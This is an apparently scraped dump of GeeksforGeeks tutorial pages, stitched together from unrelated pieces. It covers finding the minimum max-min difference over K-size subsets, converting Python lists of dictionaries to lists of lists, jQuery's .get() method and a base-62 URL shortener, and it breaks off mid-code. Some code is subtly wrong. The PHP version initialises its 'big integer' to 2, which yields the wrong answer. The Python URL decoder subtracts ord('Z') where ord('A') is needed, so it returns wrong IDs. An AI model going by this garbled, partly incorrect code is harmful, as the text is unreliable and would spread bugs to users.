which will contain our answer will always be consecutive in sorted array. " }, { "code": null, "e": 1933, "s": 1684, "text": "Starting above fact, for solving the problem first we sort the array then we will iterate over first (N – K) elements and each time we will take the difference between elements which are K distant apart and our final answer will be minimum of them." }, { "code": null, "e": 1949, "s": 1933, "text": "Implementation:" }, { "code": null, "e": 1953, "s": 1949, "text": "C++" }, { "code": null, "e": 1958, "s": 1953, "text": "Java" }, { "code": null, "e": 1966, "s": 1958, "text": "Python3" }, { "code": null, "e": 1969, "s": 1966, "text": "C#" }, { "code": null, "e": 1973, "s": 1969, "text": "PHP" }, { "code": null, "e": 1984, "s": 1973, "text": "Javascript" }, { "code": "// C++ program to find minimum difference// between max and min of all subset of K size#include <bits/stdc++.h> using namespace std; // returns min difference between max// and min of any K-size subsetint minDifferenceAmongMaxMin(int arr[], int N, int K){ // sort the array so that close // elements come together. sort(arr, arr + N); // initialize result by a big integer number int res = INT_MAX; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = min(res, curSeqDiff); } return res;} // Driver codeint main() { int arr[] = {10, 20, 30, 100, 101, 102}; int N = sizeof(arr) / sizeof(arr[0]); int K = 3; cout << minDifferenceAmongMaxMin(arr, N, K); return 0; }", "e": 2911, "s": 1984, "text": null }, { "code": "// Java program to find minimum difference// between max and min of all subset of// K sizeimport java.util.Arrays; class GFG{ // returns min difference between max // and min of any K-size subset static int minDifferenceAmongMaxMin(int arr[], int N, int K) { // sort the array so that close // elements come together. Arrays.sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver code public static void main(String[] args) { int arr[] = {10, 20, 30, 100, 101, 102}; int N = arr.length; int K = 3; System.out.print( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by Anant Agarwal.", "e": 4084, "s": 2911, "text": null }, { "code": "# Python3 program to find minimum# difference between max and min# of all subset of K size # Returns min difference between max# and min of any K-size subsetdef minDifferenceAmongMaxMin(arr, N, K): # sort the array so that close # elements come together. arr.sort() # initialize result by a # big integer number res = 2147483647 # loop over first (N - K) elements # of the array only for i in range((N - K) + 1): # get difference between max and min # of current K-sized segment curSeqDiff = arr[i + K - 1] - arr[i] res = min(res, curSeqDiff) return res # Driver Codearr = [10, 20, 30, 100, 101, 102]N = len(arr)K = 3print(minDifferenceAmongMaxMin(arr, N, K)) # This code is contributed by Anant Agarwal.", "e": 4868, "s": 4084, "text": null }, { "code": "// C# program to find minimum difference// between max and min of all subset of// K sizeusing System; class GFG{ // returns min difference between max // and min of any K-size subset static int minDifferenceAmongMaxMin(int []arr, int N, int K) { // sort the array so that close // elements come together. Array.Sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.Min(res, curSeqDiff); } return res; } // Driver code public static void Main() { int []arr= {10, 20, 30, 100, 101, 102}; int N = arr.Length; int K = 3; Console.Write( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by nitin mittal", "e": 6004, "s": 4868, "text": null }, { "code": "<?php// PHP program to find minimum difference// between max and min of all subset// of K size // returns min difference between max// and min of any K-size subsetfunction minDifferenceAmongMaxMin($arr, $N, $K){ $INT_MAX = 2; // sort the array so that close // elements come together. sort($arr); sort($arr , $N); // initialize result by a // big integer number $res = $INT_MAX; // loop over first (N - K) elements // of the array only for ($i = 0; $i <= ($N - $K); $i++) { // get difference between max and // min of current K-sized segment $curSeqDiff = $arr[$i + $K - 1] - $arr[$i]; $res = min($res, $curSeqDiff); } return $res;} // Driver Code $arr = array(10, 20, 30, 100, 101, 102); $N = sizeof($arr); $K = 3; echo minDifferenceAmongMaxMin($arr, $N, $K); // This code is contributed by Nitin Mittal.?>", "e": 6986, "s": 6004, "text": null }, { "code": "<script> // JavaScript program to find minimum difference// between max and min of all subset of// K size // returns min difference between max // and min of any K-size subset function minDifferenceAmongMaxMin(arr, N, K) { // sort the array so that close // elements come together. arr.sort((a, b) => a - b); // initialize result by // a big integer number let res = 2147483647; // loop over first (N - K) elements // of the array only for (let i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment let curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver Code let arr = [10, 20, 30, 100, 101, 102]; let N = arr.length; let K = 3; document.write( minDifferenceAmongMaxMin(arr, N, K)); </script>", "e": 7990, "s": 6986, "text": null }, { "code": null, "e": 7992, "s": 7990, "text": "2" }, { "code": null, "e": 8020, "s": 7992, "text": "Time Complexity: O(n Log n)" }, { "code": null, "e": 8320, "s": 8020, "text": "This article is contributed by Utkarsh Trivedi. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks. " }, { "code": null, "e": 8333, "s": 8320, "text": "nitin mittal" }, { "code": null, "e": 8343, "s": 8333, "text": "sanjoy_62" }, { "code": null, "e": 8359, "s": 8343, "text": "rajeev0719singh" }, { "code": null, "e": 8375, "s": 8359, "text": "simranarora5sos" }, { "code": null, "e": 8392, "s": 8375, "text": "hardikkoriintern" }, { "code": null, "e": 8399, "s": 8392, "text": "subset" }, { "code": null, "e": 8406, "s": 8399, "text": "Arrays" }, { "code": null, "e": 8414, "s": 8406, "text": "Sorting" }, { "code": null, "e": 8421, "s": 8414, "text": "Arrays" }, { "code": null, "e": 8429, "s": 8421, "text": "Sorting" }, { "code": null, "e": 8436, "s": 8429, "text": "subset" } ]
Python – Convert List of Dictionaries to List of Lists
14 May, 2020 Sometimes, while working with Python data, we can have problem in which we need to convert the list of dictionaries into list of lists, this can be simplified by appending the keys just once if they are repetitive as mostly in records, this saves memory space. This type of problem can have applications in web development domain. Let’s discuss certain ways in which this task can be performed. Input : test_list = [{‘Gfg’: 123, ‘best’: 10}, {‘Gfg’: 51, ‘best’: 7}]Output : [[‘Gfg’, ‘best’], [123, 10], [51, 7]] Input : test_list = [{‘Gfg’ : 12}]Output : [[‘Gfg’], [12]] Method #1 : Using loop + enumerate()The combination of above methods can be used to perform this task. In this, we perform the task of iterating using loop and brute force with help of enumerate() to perform appropriate append in result list. # Python3 code to demonstrate working of # Convert List of Dictionaries to List of Lists# Using loop + enumerate() # initializing listtest_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20}, {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10}, {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}] # printing original listprint("The original list is : " + str(test_list)) # Convert List of Dictionaries to List of Lists# Using loop + enumerate()res = []for idx, sub in enumerate(test_list, start = 0): if idx == 0: res.append(list(sub.keys())) res.append(list(sub.values())) else: res.append(list(sub.values())) # printing result print("The converted list : " + str(res)) The original list is : [{‘Akash’: 18, ‘Nikhil’: 17, ‘Akshat’: 20}, {‘Akash’: 30, ‘Nikhil’: 21, ‘Akshat’: 10}, {‘Akash’: 12, ‘Nikhil’: 31, ‘Akshat’: 19}]The converted list : [[‘Akash’, ‘Nikhil’, ‘Akshat’], [18, 17, 20], [30, 21, 10], [12, 31, 19]] Method #2 : Using list comprehensionThis task can be solved in one line using list comprehension. In this, we extract the keys initially using keys() and values using values(). # Python3 code to demonstrate working of # Convert List of Dictionaries to List of Lists# Using list comprehension # initializing listtest_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20}, {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10}, {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}] # printing original listprint("The original list is : " + str(test_list)) # Convert List of Dictionaries to List of Lists# Using list comprehensionres = [[key for key in test_list[0].keys()], *[list(idx.values()) for idx in test_list ]] # printing result print("The converted list : " + str(res)) The original list is : [{‘Akash’: 18, ‘Nikhil’: 17, ‘Akshat’: 20}, {‘Akash’: 30, ‘Nikhil’: 21, ‘Akshat’: 10}, {‘Akash’: 12, ‘Nikhil’: 31, ‘Akshat’: 19}]The converted list : [[‘Akash’, ‘Nikhil’, ‘Akshat’], [18, 17, 20], [30, 21, 10], [12, 31, 19]] Python dictionary-programs Python-list-of-lists Python Python Programs Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n14 May, 2020" }, { "code": null, "e": 423, "s": 28, "text": "Sometimes, while working with Python data, we can have problem in which we need to convert the list of dictionaries into list of lists, this can be simplified by appending the keys just once if they are repetitive as mostly in records, this saves memory space. This type of problem can have applications in web development domain. Let’s discuss certain ways in which this task can be performed." }, { "code": null, "e": 540, "s": 423, "text": "Input : test_list = [{‘Gfg’: 123, ‘best’: 10}, {‘Gfg’: 51, ‘best’: 7}]Output : [[‘Gfg’, ‘best’], [123, 10], [51, 7]]" }, { "code": null, "e": 599, "s": 540, "text": "Input : test_list = [{‘Gfg’ : 12}]Output : [[‘Gfg’], [12]]" }, { "code": null, "e": 842, "s": 599, "text": "Method #1 : Using loop + enumerate()The combination of above methods can be used to perform this task. In this, we perform the task of iterating using loop and brute force with help of enumerate() to perform appropriate append in result list." }, { "code": "# Python3 code to demonstrate working of # Convert List of Dictionaries to List of Lists# Using loop + enumerate() # initializing listtest_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20}, {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10}, {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}] # printing original listprint(\"The original list is : \" + str(test_list)) # Convert List of Dictionaries to List of Lists# Using loop + enumerate()res = []for idx, sub in enumerate(test_list, start = 0): if idx == 0: res.append(list(sub.keys())) res.append(list(sub.values())) else: res.append(list(sub.values())) # printing result print(\"The converted list : \" + str(res)) ", "e": 1557, "s": 842, "text": null }, { "code": null, "e": 1804, "s": 1557, "text": "The original list is : [{‘Akash’: 18, ‘Nikhil’: 17, ‘Akshat’: 20}, {‘Akash’: 30, ‘Nikhil’: 21, ‘Akshat’: 10}, {‘Akash’: 12, ‘Nikhil’: 31, ‘Akshat’: 19}]The converted list : [[‘Akash’, ‘Nikhil’, ‘Akshat’], [18, 17, 20], [30, 21, 10], [12, 31, 19]]" }, { "code": null, "e": 1983, "s": 1806, "text": "Method #2 : Using list comprehensionThis task can be solved in one line using list comprehension. In this, we extract the keys initially using keys() and values using values()." }, { "code": "# Python3 code to demonstrate working of # Convert List of Dictionaries to List of Lists# Using list comprehension # initializing listtest_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20}, {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10}, {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}] # printing original listprint(\"The original list is : \" + str(test_list)) # Convert List of Dictionaries to List of Lists# Using list comprehensionres = [[key for key in test_list[0].keys()], *[list(idx.values()) for idx in test_list ]] # printing result print(\"The converted list : \" + str(res)) ", "e": 2594, "s": 1983, "text": null }, { "code": null, "e": 2841, "s": 2594, "text": "The original list is : [{‘Akash’: 18, ‘Nikhil’: 17, ‘Akshat’: 20}, {‘Akash’: 30, ‘Nikhil’: 21, ‘Akshat’: 10}, {‘Akash’: 12, ‘Nikhil’: 31, ‘Akshat’: 19}]The converted list : [[‘Akash’, ‘Nikhil’, ‘Akshat’], [18, 17, 20], [30, 21, 10], [12, 31, 19]]" }, { "code": null, "e": 2868, "s": 2841, "text": "Python dictionary-programs" }, { "code": null, "e": 2889, "s": 2868, "text": "Python-list-of-lists" }, { "code": null, "e": 2896, "s": 2889, "text": "Python" }, { "code": null, "e": 2912, "s": 2896, "text": "Python Programs" } ]
jQuery | get() Method
01 Mar, 2019 In jQuery .get() method loads data from the server by using the GET HTTP request. This method returns XMLHttpRequest object. Syntax $.get( url, [data], [callback], [type] ) Parameters url : String containing the URL at which request is to be sentdata : This is an optional parameter that represents key/value pairs that will be sent to the server.callback: This optional parameter represents the function which is to be executed whenever the data is loaded successfully.type : This parameter represents type of data to be returned to the callback function i.e “xml”, “script”, “json”, “html”, “html”, “jsonp”, or “text”. url : String containing the URL at which request is to be sent data : This is an optional parameter that represents key/value pairs that will be sent to the server. callback: This optional parameter represents the function which is to be executed whenever the data is loaded successfully. type : This parameter represents type of data to be returned to the callback function i.e “xml”, “script”, “json”, “html”, “html”, “jsonp”, or “text”. Example: This PHP code is use to get data when below html program send the HTTP GET request.// Result.php file<?phpif( $_REQUEST["name"] ) { $name = $_REQUEST['name']; echo "Welcome ". $name;} ?> // Result.php file<?phpif( $_REQUEST["name"] ) { $name = $_REQUEST['name']; echo "Welcome ". $name;} ?> This HTML code is use to send the HTTP GET request.<html> <head> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"> </script> <script type="text/javascript" language="javascript"> $(document).ready(function() { $("#driver").click(function(event) { $.get( "result.php", { name: "GFG" }, function(data) { $('#stage').html(data); }); }); }); </script></head> <body> <p>Click on the button to load result file </p> <span id="stage" style="background-color:#cc0;"> GeeksForGeeks </span> <div> <input type="button" id="driver" value="Load Data" /> </div> </body> </html> <html> <head> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"> </script> <script type="text/javascript" language="javascript"> $(document).ready(function() { $("#driver").click(function(event) { $.get( "result.php", { name: "GFG" }, function(data) { $('#stage').html(data); }); }); }); </script></head> <body> <p>Click on the button to load result file </p> <span id="stage" style="background-color:#cc0;"> GeeksForGeeks </span> <div> <input type="button" id="driver" value="Load Data" /> </div> </body> </html> Output:Before clicking on the button: After clicking on the button: jQuery-Methods Picked JQuery Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. JQuery | Set the value of an input text field How to change selected value of a drop-down list using jQuery? Form validation using jQuery How to add options to a select element using jQuery? How to Dynamically Add/Remove Table Rows using jQuery ? Installation of Node.js on Linux Top 10 Projects For Beginners To Practice HTML and CSS Skills Difference between var, let and const keywords in JavaScript How to insert spaces/tabs in text using HTML/CSS? How to fetch data from an API in ReactJS ?
[ { "code": null, "e": 28, "s": 0, "text": "\n01 Mar, 2019" }, { "code": null, "e": 153, "s": 28, "text": "In jQuery .get() method loads data from the server by using the GET HTTP request. This method returns XMLHttpRequest object." }, { "code": null, "e": 160, "s": 153, "text": "Syntax" }, { "code": null, "e": 202, "s": 160, "text": "$.get( url, [data], [callback], [type] )\n" }, { "code": null, "e": 213, "s": 202, "text": "Parameters" }, { "code": null, "e": 650, "s": 213, "text": "url : String containing the URL at which request is to be sentdata : This is an optional parameter that represents key/value pairs that will be sent to the server.callback: This optional parameter represents the function which is to be executed whenever the data is loaded successfully.type : This parameter represents type of data to be returned to the callback function i.e “xml”, “script”, “json”, “html”, “html”, “jsonp”, or “text”." }, { "code": null, "e": 713, "s": 650, "text": "url : String containing the URL at which request is to be sent" }, { "code": null, "e": 815, "s": 713, "text": "data : This is an optional parameter that represents key/value pairs that will be sent to the server." }, { "code": null, "e": 939, "s": 815, "text": "callback: This optional parameter represents the function which is to be executed whenever the data is loaded successfully." }, { "code": null, "e": 1090, "s": 939, "text": "type : This parameter represents type of data to be returned to the callback function i.e “xml”, “script”, “json”, “html”, “html”, “jsonp”, or “text”." }, { "code": null, "e": 1099, "s": 1090, "text": "Example:" }, { "code": null, "e": 1293, "s": 1099, "text": "This PHP code is use to get data when below html program send the HTTP GET request.// Result.php file<?phpif( $_REQUEST[\"name\"] ) { $name = $_REQUEST['name']; echo \"Welcome \". $name;} ?>" }, { "code": "// Result.php file<?phpif( $_REQUEST[\"name\"] ) { $name = $_REQUEST['name']; echo \"Welcome \". $name;} ?>", "e": 1404, "s": 1293, "text": null }, { "code": null, "e": 2288, "s": 1404, "text": "This HTML code is use to send the HTTP GET request.<html> <head> <script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js\"> </script> <script type=\"text/javascript\" language=\"javascript\"> $(document).ready(function() { $(\"#driver\").click(function(event) { $.get( \"result.php\", { name: \"GFG\" }, function(data) { $('#stage').html(data); }); }); }); </script></head> <body> <p>Click on the button to load result file </p> <span id=\"stage\" style=\"background-color:#cc0;\"> GeeksForGeeks </span> <div> <input type=\"button\" id=\"driver\" value=\"Load Data\" /> </div> </body> </html>" }, { "code": "<html> <head> <script type=\"text/javascript\" src=\"https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js\"> </script> <script type=\"text/javascript\" language=\"javascript\"> $(document).ready(function() { $(\"#driver\").click(function(event) { $.get( \"result.php\", { name: \"GFG\" }, function(data) { $('#stage').html(data); }); }); }); </script></head> <body> <p>Click on the button to load result file </p> <span id=\"stage\" style=\"background-color:#cc0;\"> GeeksForGeeks </span> <div> <input type=\"button\" id=\"driver\" value=\"Load Data\" /> </div> </body> </html>", "e": 3121, "s": 2288, "text": null }, { "code": null, "e": 3159, "s": 3121, "text": "Output:Before clicking on the button:" }, { "code": null, "e": 3189, "s": 3159, "text": "After clicking on the button:" }, { "code": null, "e": 3204, "s": 3189, "text": "jQuery-Methods" }, { "code": null, "e": 3211, "s": 3204, "text": "Picked" }, { "code": null, "e": 3218, "s": 3211, "text": "JQuery" }, { "code": null, "e": 3235, "s": 3218, "text": "Web Technologies" }, { "code": null, "e": 3333, "s": 3235, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 3379, "s": 3333, "text": "JQuery | Set the value of an input text field" }, { "code": null, "e": 3442, "s": 3379, "text": "How to change selected value of a drop-down list using jQuery?" }, { "code": null, "e": 3471, "s": 3442, "text": "Form validation using jQuery" }, { "code": null, "e": 3524, "s": 3471, "text": "How to add options to a select element using jQuery?" }, { "code": null, "e": 3580, "s": 3524, "text": "How to Dynamically Add/Remove Table Rows using jQuery ?" }, { "code": null, "e": 3613, "s": 3580, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 3675, "s": 3613, "text": "Top 10 Projects For Beginners To Practice HTML and CSS Skills" }, { "code": null, "e": 3736, "s": 3675, "text": "Difference between var, let and const keywords in JavaScript" }, { "code": null, "e": 3786, "s": 3736, "text": "How to insert spaces/tabs in text using HTML/CSS?" } ]
How to design a tiny URL or URL shortener?
27 Jun, 2022 How to design a system that takes big URLs like “https://www.geeksforgeeks.org/count-sum-of-digits-in-numbers-from-1-to-n/” and converts them into a short 6 character URL. It is given that URLs are stored in the database and every URL has an associated integer id. One important thing to note is, the long URL should also be uniquely identifiable from the short URL. So we need a Bijective Function One Simple Solution could be Hashing. Use a hash function to convert long string to short string. In hashing, that may be collisions (2 long URLs map to same short URL) and we need a unique short URL for every long URL so that we can access long URL back. A Better Solution is to use the integer id stored in the database and convert the integer to a character string that is at most 6 characters long. This problem can basically seen as a base conversion problem where we have a 10 digit input number and we want to convert it into a 6-character long string. Below is one important observation about possible characters in URL. A URL character can be one of the following A lower case alphabet [‘a’ to ‘z’], total 26 characters An upper case alphabet [‘A’ to ‘Z’], total 26 characters A digit [‘0’ to ‘9’], total 10 characters A lower case alphabet [‘a’ to ‘z’], total 26 characters An upper case alphabet [‘A’ to ‘Z’], total 26 characters A digit [‘0’ to ‘9’], total 10 characters There are total 26 + 26 + 10 = 62 possible characters.So the task is to convert a decimal number to base 62 number. To get the original long URL, we need to get URL id in the database. The id can be obtained using base 62 to decimal conversion. Implementation: C++ Java Python3 C# Javascript // C++ program to generate short url from integer id and// integer id back from short url.#include<iostream>#include<algorithm>#include<string>using namespace std; // Function to generate a short url from integer IDstring idToShortURL(long int n){ // Map to store 62 possible characters char map[] = "abcdefghijklmnopqrstuvwxyzABCDEF" "GHIJKLMNOPQRSTUVWXYZ0123456789"; string shorturl; // Convert given integer id to a base 62 number while (n) { // use above map to store actual character // in short url shorturl.push_back(map[n%62]); n = n/62; } // Reverse shortURL to complete base conversion reverse(shorturl.begin(), shorturl.end()); return shorturl;} // Function to get integer ID back from a short urllong int shortURLtoID(string shortURL){ long int id = 0; // initialize result // A simple base conversion logic for (int i=0; i < shortURL.length(); i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id*62 + shortURL[i] - 'a'; if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id*62 + shortURL[i] - 'A' + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id*62 + shortURL[i] - '0' + 52; } return id;} // Driver program to test above functionint main(){ int n = 12345; string shorturl = idToShortURL(n); cout << "Generated short url is " << shorturl << endl; cout << "Id from url is " << shortURLtoID(shorturl); return 0;} // Java program to generate short url from integer id and // integer id back from short url. import java.util.*;import java.lang.*;import java.io.*; class GFG{ // Function to generate a short url from integer ID static String idToShortURL(int n) { // Map to store 62 possible characters char map[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray(); StringBuffer shorturl = new StringBuffer(); // Convert given integer id to a base 62 number while (n > 0) { // use above map to store actual character // in short url shorturl.append(map[n % 62]); n = n / 62; } // Reverse shortURL to complete base conversion return shorturl.reverse().toString(); } // Function to get integer ID back from a short url static int shortURLtoID(String shortURL) { int id = 0; // initialize result // A simple base conversion logic for (int i = 0; i < shortURL.length(); i++) { if ('a' <= shortURL.charAt(i) && shortURL.charAt(i) <= 'z') id = id * 62 + shortURL.charAt(i) - 'a'; if ('A' <= shortURL.charAt(i) && shortURL.charAt(i) <= 'Z') id = id * 62 + shortURL.charAt(i) - 'A' + 26; if ('0' <= shortURL.charAt(i) && shortURL.charAt(i) <= '9') id = id * 62 + shortURL.charAt(i) - '0' + 52; } return id; } // Driver Code public static void main (String[] args) throws IOException { int n = 12345; String shorturl = idToShortURL(n); System.out.println("Generated short url is " + shorturl); System.out.println("Id from url is " + shortURLtoID(shorturl)); }} // This code is contributed by shubham96301 # Python3 code for above approach def idToShortURL(id): map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" shortURL = "" # for each digit find the base 62 while(id > 0): shortURL += map[id % 62] id //= 62 # reversing the shortURL return shortURL[len(shortURL): : -1] def shortURLToId(shortURL): id = 0 for i in shortURL: val_i = ord(i) if(val_i >= ord('a') and val_i <= ord('z')): id = id*62 + val_i - ord('a') elif(val_i >= ord('A') and val_i <= ord('Z')): id = id*62 + val_i - ord('Z') + 26 else: id = id*62 + val_i - ord('0') + 52 return id if (__name__ == "__main__"): id = 12345 shortURL = idToShortURL(id) print("Short URL from 12345 is : ", shortURL) print("ID from", shortURL, "is : ", shortURLToId(shortURL)) // C# program to generate short url from integer id and // integer id back from short url. using System; public class GFG{ // Function to generate a short url from integer ID static String idToShortURL(int n) { // Map to store 62 possible characters char []map = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".ToCharArray(); String shorturl = ""; // Convert given integer id to a base 62 number while (n > 0) { // use above map to store actual character // in short url shorturl+=(map[n % 62]); n = n / 62; } // Reverse shortURL to complete base conversion return reverse(shorturl); } static String reverse(String input) { char[] a = input.ToCharArray(); int l, r = a.Length - 1; for (l = 0; l < r; l++, r--) { char temp = a[l]; a[l] = a[r]; a[r] = temp; } return String.Join("",a); } // Function to get integer ID back from a short url static int shortURLtoID(String shortURL) { int id = 0; // initialize result // A simple base conversion logic for (int i = 0; i < shortURL.Length; i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id * 62 + shortURL[i] - 'a'; if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id * 62 + shortURL[i] - 'A' + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id * 62 + shortURL[i] - '0' + 52; } return id; } // Driver Code public static void Main(String[] args) { int n = 12345; String shorturl = idToShortURL(n); Console.WriteLine("Generated short url is " + shorturl); Console.WriteLine("Id from url is " + shortURLtoID(shorturl)); }} // This code is contributed by 29AjayKumar <script>// Javascript program to generate short url from integer id and// integer id back from short url. // Function to generate a short url from integer IDfunction idToShortURL(n) { // Map to store 62 possible characters let map = "abcdefghijklmnopqrstuvwxyzABCDEF" "GHIJKLMNOPQRSTUVWXYZ0123456789"; let shorturl = []; // Convert given integer id to a base 62 number while (n) { // use above map to store actual character // in short url shorturl.push(map[n % 62]); n = Math.floor(n / 62); } // Reverse shortURL to complete base conversion shorturl.reverse(); return shorturl.join("");} // Function to get integer ID back from a short urlfunction shortURLtoID(shortURL) { let id = 0; // initialize result // A simple base conversion logic for (let i = 0; i < shortURL.length; i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id * 62 + shortURL[i].charCodeAt(0) - 'a'.charCodeAt(0); if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id * 62 + shortURL[i].charCodeAt(0) - 'A'.charCodeAt(0) + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id * 62 + shortURL[i].charCodeAt(0) - '0'.charCodeAt(0) + 52; } return id;} // Driver program to test above function let n = 12345;let shorturl = idToShortURL(n);document.write("Generated short url is " + shorturl + "<br>");document.write("Id from url is " + shortURLtoID(shorturl)); // This code is contributed by gfgking.</script> Generated short url is dnh Id from url is 12345 Time complexity : O(n) Auxiliary Space : O(1) Optimization: We can avoid reverse step in idToShortURL(). To make sure that we get the same ID back, we also need to change shortURLtoID() to process characters from the end instead of the beginning. shubham_singh Akanksha_Rai nobody_cares whiteknight gfgking 29AjayKumar youmailmahibagi hardikkoriintern Hike Microsoft Advanced Data Structure Arrays Strings Microsoft Hike Arrays Strings Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 54, "s": 26, "text": "\n27 Jun, 2022" }, { "code": null, "e": 320, "s": 54, "text": "How to design a system that takes big URLs like “https://www.geeksforgeeks.org/count-sum-of-digits-in-numbers-from-1-to-n/” and converts them into a short 6 character URL. It is given that URLs are stored in the database and every URL has an associated integer id. " }, { "code": null, "e": 456, "s": 320, "text": "One important thing to note is, the long URL should also be uniquely identifiable from the short URL. So we need a Bijective Function " }, { "code": null, "e": 712, "s": 456, "text": "One Simple Solution could be Hashing. Use a hash function to convert long string to short string. In hashing, that may be collisions (2 long URLs map to same short URL) and we need a unique short URL for every long URL so that we can access long URL back." }, { "code": null, "e": 1017, "s": 712, "text": "A Better Solution is to use the integer id stored in the database and convert the integer to a character string that is at most 6 characters long. This problem can basically seen as a base conversion problem where we have a 10 digit input number and we want to convert it into a 6-character long string. " }, { "code": null, "e": 1086, "s": 1017, "text": "Below is one important observation about possible characters in URL." }, { "code": null, "e": 1131, "s": 1086, "text": "A URL character can be one of the following " }, { "code": null, "e": 1286, "s": 1131, "text": "A lower case alphabet [‘a’ to ‘z’], total 26 characters An upper case alphabet [‘A’ to ‘Z’], total 26 characters A digit [‘0’ to ‘9’], total 10 characters" }, { "code": null, "e": 1343, "s": 1286, "text": "A lower case alphabet [‘a’ to ‘z’], total 26 characters " }, { "code": null, "e": 1401, "s": 1343, "text": "An upper case alphabet [‘A’ to ‘Z’], total 26 characters " }, { "code": null, "e": 1443, "s": 1401, "text": "A digit [‘0’ to ‘9’], total 10 characters" }, { "code": null, "e": 1688, "s": 1443, "text": "There are total 26 + 26 + 10 = 62 possible characters.So the task is to convert a decimal number to base 62 number. To get the original long URL, we need to get URL id in the database. The id can be obtained using base 62 to decimal conversion." }, { "code": null, "e": 1704, "s": 1688, "text": "Implementation:" }, { "code": null, "e": 1708, "s": 1704, "text": "C++" }, { "code": null, "e": 1713, "s": 1708, "text": "Java" }, { "code": null, "e": 1721, "s": 1713, "text": "Python3" }, { "code": null, "e": 1724, "s": 1721, "text": "C#" }, { "code": null, "e": 1735, "s": 1724, "text": "Javascript" }, { "code": "// C++ program to generate short url from integer id and// integer id back from short url.#include<iostream>#include<algorithm>#include<string>using namespace std; // Function to generate a short url from integer IDstring idToShortURL(long int n){ // Map to store 62 possible characters char map[] = \"abcdefghijklmnopqrstuvwxyzABCDEF\" \"GHIJKLMNOPQRSTUVWXYZ0123456789\"; string shorturl; // Convert given integer id to a base 62 number while (n) { // use above map to store actual character // in short url shorturl.push_back(map[n%62]); n = n/62; } // Reverse shortURL to complete base conversion reverse(shorturl.begin(), shorturl.end()); return shorturl;} // Function to get integer ID back from a short urllong int shortURLtoID(string shortURL){ long int id = 0; // initialize result // A simple base conversion logic for (int i=0; i < shortURL.length(); i++) { if ('a' <= shortURL[i] && shortURL[i] <= 'z') id = id*62 + shortURL[i] - 'a'; if ('A' <= shortURL[i] && shortURL[i] <= 'Z') id = id*62 + shortURL[i] - 'A' + 26; if ('0' <= shortURL[i] && shortURL[i] <= '9') id = id*62 + shortURL[i] - '0' + 52; } return id;} // Driver program to test above functionint main(){ int n = 12345; string shorturl = idToShortURL(n); cout << \"Generated short url is \" << shorturl << endl; cout << \"Id from url is \" << shortURLtoID(shorturl); return 0;}", "e": 3246, "s": 1735, "text": null }, { "code": "// Java program to generate short url from integer id and // integer id back from short url. import java.util.*;import java.lang.*;import java.io.*; class GFG{ // Function to generate a short url from integer ID static String idToShortURL(int n) { // Map to store 62 possible characters char map[] = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\".toCharArray(); StringBuffer shorturl = new StringBuffer(); // Convert given integer id to a base 62 number while (n > 0) { // use above map to store actual character // in short url shorturl.append(map[n % 62]); n = n / 62; } // Reverse shortURL to complete base conversion return shorturl.reverse().toString(); } // Function to get integer ID back from a short url static int shortURLtoID(String shortURL) { int id = 0; // initialize result // A simple base conversion logic for (int i = 0; i < shortURL.length(); i++) { if ('a' <= shortURL.charAt(i) && shortURL.charAt(i) <= 